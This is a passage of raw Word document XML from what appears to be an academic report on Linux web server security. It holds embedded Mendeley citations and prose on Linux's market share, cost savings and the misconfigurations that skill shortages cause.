        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.ubuntu.com/download/server","accessed":{"date-parts":[["2019","4","23"]]},"author":[{"dropping-particle":"","family":"Ubuntu","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"ubuntu.com","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"page":"1","title":"Linux - Ubuntu Server","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=7d3f744a-885e-3dcb-923b-cdd48bb627c5"]}],"mendeley":{"formattedCitation":"[34]","plainTextFormattedCitation":"[34]","previouslyFormattedCitation":"[34]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[34]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>, Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.kali.org/","accessed":{"date-parts":[["2018","5","23"]]},"author":[{"dropping-particle":"","family":"Offensive-Security","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"kali.org","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=84b494af-9875-320b-b28c-22df05c84bdf"]}],"mendeley":{"formattedCitation":"[35]","plainTextFormattedCitation":"[35]","previouslyFormattedCitation":"[35]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[35]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t>, Debian Linux</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.debian.org/","abstract":"Debian Linux OS","accessed":{"date-parts":[["2019","5","1"]]},"author":[{"dropping-particle":"","family":"Debian","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"debian.org","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"page":"1","title":"Debian -- The Universal Operating System","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=e996f9f0-56ab-3755-aff4-ca0e51917a25"]}],"mendeley":{"formattedCitation":"[36]","plainTextFormattedCitation":"[36]","previouslyFormattedCitation":"[36]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[36]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> and many more</w:t>
      </w:r>
      <w:r w:rsidR="00B965E4">
        <w:t xml:space="preserve">, created by the Linux community and companies around the world under the open source General Public License (GPL) </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/b978-159749036-8/50015-x","abstract":"The GNU General Public License is a free, copyleft license for software\\nand other kinds of works.\\n\\n\\nThe licenses for most software and other practical works are designed\\nto take away your freedom to share and change the works. By contrast,\\nthe GNU General Public License is intended to guarantee your freedom\\nto share and change all versions of a program--to make sure it remains\\nfree software for all its users. We, the Free Software Foundation,\\nuse the GNU General Public License for most of our software; it applies\\nalso to any other work released this way by its authors. You can\\napply it to your programs, too.\\n\\n\\nWhen we speak of free software, we are referring to freedom, not price.\\nOur General Public Licenses are designed to make sure that you have\\nthe freedom to distribute copies of free software (and charge for\\nthem if you wish), that you receive source code or can get it if\\nyou want it, that you can change the software or use pieces of it\\nin new free programs, and that you know you can do these things.\\n\\n\\nTo protect your rights, we need to prevent others from denying you\\nthese rights or asking you to surrender the rights. Therefore, you\\nhave certain responsibilities if you distribute copies of the software,\\nor if you modify it: responsibilities to respect the freedom of others.\\n\\n\\nFor example, if you distribute copies of such a program, whether gratis\\nor for a fee, you must pass on to the recipients the same freedoms\\nthat you received. You must make sure that they, too, receive or\\ncan get the source code. And you must show them these terms so they\\nknow their rights.\\n\\n\\nDevelopers that use the GNU GPL protect your rights with two steps:\\n(1) assert copyright on the software, and (2) offer you this License\\ngiving you legal permission to copy, distribute and/or modify it.\\n\\n\\nFor the developers' and authors' protection, the GPL clearly explains\\nthat there is no warranty for this free software. For both users'\\nand authors' sake, the GPL requires that modified versions be marked\\nas changed, so that their problems will not be attributed erroneously\\nto authors of previous versions.\\n\\n\\nSome devices are designed to deny users access to install or run modified\\nversions of the software inside them, although the manufacturer can\\ndo so. This is fundamentally incompatible with the aim of protecting\\nusers' freedom to change the software. The systematic pattern of\\nsuch abuse occurs in the area of products for individuals to…","container-title":"Sarbanes-Oxley IT Compliance Using COBIT and Open Source Tools","id":"ITEM-1","issued":{"date-parts":[["2005"]]},"title":"The GNU General Public License","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=b59821ed-5fbd-4b2b-8695-4f95653afa64"]}],"mendeley":{"formattedCitation":"[37]","plainTextFormattedCitation":"[37]","previouslyFormattedCitation":"[37]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[37]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B965E4">
        <w:t>agreement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BA2B3E" w14:textId="7B543ED8" w:rsidR="003A23D8" w:rsidRDefault="00431E0E" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>It is estimated by ‘Gartner’</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.gartner.com/en/newsroom/press-releases/2019-04-02-gartner-forecasts-worldwide-public-cloud-revenue-to-g","accessed":{"date-parts":[["2020","1","30"]]},"author":[{"dropping-particle":"","family":"Gartner","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["2019"]]},"page":"1-1","title":"Gartner Forecasts Worldwide Public Cloud Revenue to Grow 17.5 Percent in 2019","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=c80b6fe3-2f2a-3660-a69a-f62a3c0e4d96"]}],"mendeley":{"formattedCitation":"[38]","plainTextFormattedCitation":"[38]","previouslyFormattedCitation":"[38]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[38]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> whom are an Information Communications Technology (I</w:t>
      </w:r>
      <w:r w:rsidR="008F6FEF">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">T) business </w:t>
      </w:r>
      <w:r w:rsidR="008F6FEF">
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r>
        <w:t>analytical company</w:t>
      </w:r>
      <w:r w:rsidR="00960949">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="006562B6">
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of all webservers in the world utilise a Linux</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS to host websites</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve">. Linux servers are </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t>prevalent</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> because of the</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> efficiency</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> OS</w:t>
      </w:r>
      <w:r w:rsidR="008F6FEF">
        <w:t xml:space="preserve"> Kernel and shell</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> architecture that utilises the underlying computer hardware very </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t>resourcefully,</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> thus providing </w:t>
      </w:r>
      <w:r w:rsidR="008F6FEF">
        <w:t>large</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> economical savings to companies whom opt to utilise a Linux server distributio</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t>that requires significantly less</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> server hardware </w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t xml:space="preserve">to host and deploy website services, </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t>along with no</w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t>t having to pay</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> licensing fees</w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:lastRenderedPageBreak/>
        <w:t>opposed to a Microsoft Windows server</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.microsoftpressstore.com/articles/article.aspx?p=2201311","accessed":{"date-parts":[["2018","2","14"]]},"author":[{"dropping-particle":"","family":"Microsoft","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"micorsoft press store","id":"ITEM-1","issued":{"date-parts":[["2012"]]},"page":"1","title":"Windows Server 2012 Administration Overview | Microsoft Press Store","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=ca00d641-77f7-38fd-9885-528d38ec24cb"]}],"mendeley":{"formattedCitation":"[39]","plainTextFormattedCitation":"[39]","previouslyFormattedCitation":"[39]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[39]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> solution</w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t xml:space="preserve"> that is very resource intensive, less efficient/responsive and expensive to buy but </w:t>
      </w:r>
      <w:r w:rsidR="00A95E87">
        <w:t>a lot less complex</w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t xml:space="preserve"> to configure due to its</w:t>
      </w:r>
      <w:r w:rsidR="00142C54">
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t xml:space="preserve"> friendly GUI architecture</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00333F19">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB1E9FF" w14:textId="60F9CB25" w:rsidR="00CA4048" w:rsidRDefault="00333F19" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Therefore, when a penetration tester or malicious actor aims to discover</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> new or exploit existing vulnerabilities within a web server,</w:t>
      </w:r>
      <w:r w:rsidR="00B26700">
        <w:t xml:space="preserve"> they generally design Linux web server exploits</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> to maximise the profitability of the malicious tool</w:t>
      </w:r>
      <w:r w:rsidR="00B26700">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC308B">
        <w:t xml:space="preserve"> Although Linux is highly efficient, configuring and maintaining a Linux server correctly </w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t xml:space="preserve">utilising the </w:t>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:t xml:space="preserve">BASH </w:t>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"0974433942","abstract":"This guide discusses concepts useful in the daily life of the serious Bash user. While a basic knowledge of shell usage is required, it starts with a discussion of shell building blocks and common practices. Then it presents the grep, awk and sed tools that will later be used to create more interesting examples. The second half of the course is about shell constructs such as loops, conditional tests, functions and traps, and a number of ways to make interactive scripts. All chapters come with examples and exercises that will help you become familiar with the theory. Author Biography: Linux advocate of the first hour, Machtelt Garrels has made many contributions to the Open Source community and has been working for over a decade on the wider acceptance of Linux and other Open Source products. She is an active member of the Linux Documentation Project and training manager at CoreSequence. She writes whenever she has the time, closing gaps in existing documentation and taking the opportunity to simplify it when necessary, always keeping in mind that practice is the only way to learn. As a result, her work is full of examples and exercises, forcing the reader to apply the theoretical concepts.","author":[{"dropping-particle":"","family":"Garrels","given":"Machtelt","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Linux Documentation Project Collection","id":"ITEM-1","issued":{"date-parts":[["2004"]]},"title":"Bash Guide for Beginners","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=9e105f92-2803-4bfa-a77a-60cb63a28378"]}],"mendeley":{"formattedCitation":"[40]","plainTextFormattedCitation":"[40]","previouslyFormattedCitation":"[40]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DC05AB" w:rsidRPr="00DC05AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[40]</w:t>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t xml:space="preserve"> CLI, </w:t>
      </w:r>
      <w:r w:rsidR="00EC308B">
        <w:t xml:space="preserve">is a highly specialised and </w:t>
      </w:r>
      <w:r w:rsidR="002342DE">
        <w:t>sought-after</w:t>
      </w:r>
      <w:r w:rsidR="00EC308B">
        <w:t xml:space="preserve"> skill within systems </w:t>
      </w:r>
      <w:r w:rsidR="00D92D55">
        <w:t>engineering</w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t xml:space="preserve"> where there is a global shortage of </w:t>
      </w:r>
      <w:r w:rsidR="002342DE">
        <w:t xml:space="preserve">competent </w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t>Linux systems engineers</w:t>
      </w:r>
      <w:r w:rsidR="002342DE">
        <w:t>. The lack of skill within this specialised area of comput</w:t>
      </w:r>
      <w:r w:rsidR="004F0CA1">
        <w:t>er engineering</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t>consequently</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> leads to </w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t xml:space="preserve"> misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t>s of Linux</w:t>
      </w:r>
      <w:r w:rsidR="004F0CA1">
        <w:t xml:space="preserve"> OS and their</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="002342DE">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t xml:space="preserve"> due to the lack of knowledge and experience within Linux</w:t>
      </w:r>
      <w:r w:rsidR="002342DE">
        <w:t xml:space="preserve"> by many systems engineers</w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t xml:space="preserve">, these crucial factors </w:t>
      </w:r>
      <w:r w:rsidR="00F552B7">
        <w:t xml:space="preserve">evidently </w:t>
      </w:r>
      <w:r w:rsidR="002342DE">
        <w:t xml:space="preserve">lead to </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="003A23D8">
        <w:t xml:space="preserve">within the system </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t>for malicious actors to exploit</w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="002342DE">
        <w:t>inopportunely</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t>common place</w:t>
      </w:r>
      <w:r w:rsidR="00077909">
        <w:t xml:space="preserve"> within the webserver industry</w:t>
      </w:r>
      <w:r w:rsidR="00C73F5C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC308B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1036/0072262575","ISBN":"0071596429","ISSN":"1098-6596","PMID":"25246403","abstract":"The Latest Linux Security Solutions This authoritative guide will help you secure your Linux network--whether you use Linux as a desktop OS, for Internet services, for telecommunications, or for wireless services. Completely rewritten the ISECOM way, Hacking Exposed Linux, Third Edition provides the most up-to-date coverage available from a large team of topic-focused experts. The book is based on the latest ISECOM security research and shows you, in full detail, how to lock out intruders and defend your Linux systems against catastrophic attacks. Secure Linux by using attacks and countermeasures from the latest OSSTMM research Follow attack techniques of PSTN, ISDN, and PSDN over Linux Harden VoIP, Bluetooth, RF, RFID, and IR devices on Linux Block Linux signal jamming, cloning, and eavesdropping attacks Apply Trusted Computing and cryptography tools for your best defense Fix vulnerabilities in DNS, SMTP, and Web 2.0 services Prevent SPAM, Trojan, phishing, DoS, and DDoS exploits Find and repair errors in C code with static analysis and Hoare Logic","author":[{"dropping-particle":"","family":"Conover","given":"Matthew","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Hacking","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"number-of-pages":"649","title":"Hacking Exposed Linux : Linux Security Secrets and Solutions, Third Edition","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=d311dcf3-525b-4a11-8021-cf7b8e8126f9"]}],"mendeley":{"formattedCitation":"[41]","plainTextFormattedCitation":"[41]","previouslyFormattedCitation":"[41]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DC05AB" w:rsidRPr="00DC05AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[41]</w:t>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"9781593271442","abstract":"Hacking is the art of creative problem solving, whether that means finding an unconventional solution to a difficult problem or exploiting holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation needed to really push the envelope. Rather than merely showing how to run existing exploits, author Jon Erickson explains how arcane hacking techniques actually work. To share the art and science of hacking in a way that is accessible to everyone, Hacking: The Art of Exploitation, 2nd Edition introduces the fundamentals of C programming from a hacker's perspective. The included LiveCD provides a complete Linux programming and debugging environment-all without modifying your current operating system. Use it to follow along with the book's examples as you fill gaps in your knowledge and explore hacking techniques on your own. Get your hands dirty debugging code, overflowing buffers, hijacking network communications, bypassing protections, exploiting cryptographic weaknesses, and perhaps even inventing new exploits. This book will teach you how to: Program computers using C, assembly language, and shell scripts Corrupt system memory to run arbitrary code using buffer overflows and format strings Inspect processor registers and system memory with a debugger to gain a real understanding of what is happening Outsmart common security measures like nonexecutable stacks and intrusion detection systems Gain access to a remote server using port-binding or connect-back shellcode, and alter a server's logging behavior to hide your presence Redirect network traffic, conceal open ports, and hijack TCP connections Crack encrypted wireless traffic using the FMS attack, and speed up brute-force attacks using a password probability matrix Hackers are always pushing the boundaries, investigating the unknown, and evolving their art. Even if you don't already know how to program, Hacking: The Art of Exploitation, 2nd Edition will give you a complete picture of programming, machine architecture, network communications, and existing hacking techniques. Combine this knowledge with the included Linux environment, and all you need is your own creativity.","author":[{"dropping-particle":"","family":"Erickson","given":"Jon","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Assembly","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"number-of-pages":"480","title":"Hacking: The Art of Exploitation, 2nd Edition","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=6e10367c-08ff-43e4-bca2-606bcca5994a"]},{"id":"ITEM-2","itemData":{"DOI":"10.1007/978-3-642-39498-0_4","ISBN":"9783642394980","abstract":"In economic models of cybersecurity, security investment yields positive, but diminishing, returns. If that were true for software vulnerabilities, fix rates should decrease, whereas the time between successive fixes should go up as vulnerabilities become fewer and harder to fix.In this work, we examine the empirical evidence for this hypothesis for Mozilla, Apache httpd and Apache Tomcat over the last several years. By looking at 292 vulnerability reports for Mozilla, 66 for Apache, and 21 for Tomcat, we find that the number of people committing vulnerability fixes changes proportionally to the number of vulnerability fixes for Mozilla and Tomcat, but not for Apache httpd.Our findings do not support the hypothesis that vulnerability fix rates decline. It seems as if the supply of easily fixable vulnerabilities is not running out and returns are not diminishing (yet).Additionally, software security has traditionally been viewed as an arms race between attackers and defenders. Recent work in an unrelated field has produced precise mathematical models for such arms races, but again the evidence we find is scant and does not support the hypothesis of an arms race (of this kind).","author":[{"dropping-particle":"","family":"Neuhaus","given":"Stephan","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Plattner","given":"Bernhard","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Economics of Information Security and Privacy","id":"ITEM-2","issued":{"date-parts":[["2013"]]},"title":"Software security economics: Theory, in practice","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=3fa9cfbb-df80-4e13-bf75-388482a7029d"]}],"mendeley":{"formattedCitation":"[42], [43]","plainTextFormattedCitation":"[42], [43]","previouslyFormattedCitation":"[42], [43]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007D5F13" w:rsidRPr="007D5F13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[42], [43]</w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CD03CD" w14:textId="17FD15AE" w:rsidR="001C388D" w:rsidRDefault="00244FB3" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As previously discussed,</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> the majority of Linux OS are open source so there is no licencing fees when utilising them</w:t>
      </w:r>
      <w:r w:rsidR="00F2598E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> which provides further economical saving for companies whom </w:t>
      </w:r>
      <w:r>
        <w:t>employ</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within their webservers</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve">, this is also true for the </w:t>
      </w:r>
      <w:r w:rsidR="008F6FEF">
        <w:t xml:space="preserve">highly efficient and popular </w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>software tools that are most commonly used within a Linux webserver such as; Apache</w:t>
      </w:r>
      <w:r w:rsidR="00FB57AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>webserver</w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Established in 1999, the ASF is a US 501(c)(3) charitable organization, funded by individual donations and corporate sponsors. Our all-volunteer board oversees more than 350 leading Open Source projects, including Apache HTTP Server -- the world's most popular Web server software.\n\nThe ASF provides an established framework for intellectual property and financial contributions that simultaneously limits potential legal exposure for our project committers. Through the ASF's meritocratic process known as \"The Apache Way,\" more than 620 individual Members and 5,500 Committers successfully collaborate to develop freely available enterprise-grade software, benefiting millions of users worldwide: thousands of software solutions are distributed under the Apache License; and the community actively participates in ASF mailing lists, mentoring initiatives, and ApacheCon, the Foundation's official user conference, trainings, and expo.","author":[{"dropping-particle":"","family":"Apache","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Hadoop website","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"The Apache Software 